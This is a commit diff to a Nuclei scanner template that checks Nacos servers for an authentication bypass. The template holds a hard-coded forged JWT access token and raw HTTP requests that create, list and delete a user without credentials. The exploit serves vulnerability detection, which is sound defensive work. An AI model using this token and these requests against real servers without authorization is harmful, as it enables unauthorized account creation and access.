Merge pull request #12683 from projectdiscovery/pussycat0x-patch-12

ritikchaddha · web-flow · commit 8e05d32aade7 · 2025-07-22T14:22:04.000+05:30
FN Fix  nacos-create-user.yaml
diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml
@@ -18,28 +18,27 @@ info:
     shodan-query: title:"Nacos"
   tags: misconfig,nacos,unauth,bypass,instrusive
 
+variables:
+  token: "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g"
+
 http:
   - raw:
       - |
         POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
         Host: {{Hostname}}
+
       - |
         GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
         Host: {{Hostname}}
+
       - |
         DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
         Host: {{Hostname}}
 
-    payloads:
-      token:
-        - eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
-    attack: pitchfork
-
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - "status_code_1 == 200 && contains(body_1,'create user ok!')"
           - "status_code_3 == 200 && contains(body_3,'delete user ok!')"
         condition: and
-# digest: 4a0a00473045022100b3970f3b9132eb9453b5492a4f6e332fd7fbe4878f80e2d76e09af9d1483dbdd022065b272b997fd05972f333efac30e4ea18b34ea44a87cdb68f2ddf0f4d3119d5d:922c64590222798bb761d5b6d8e72950
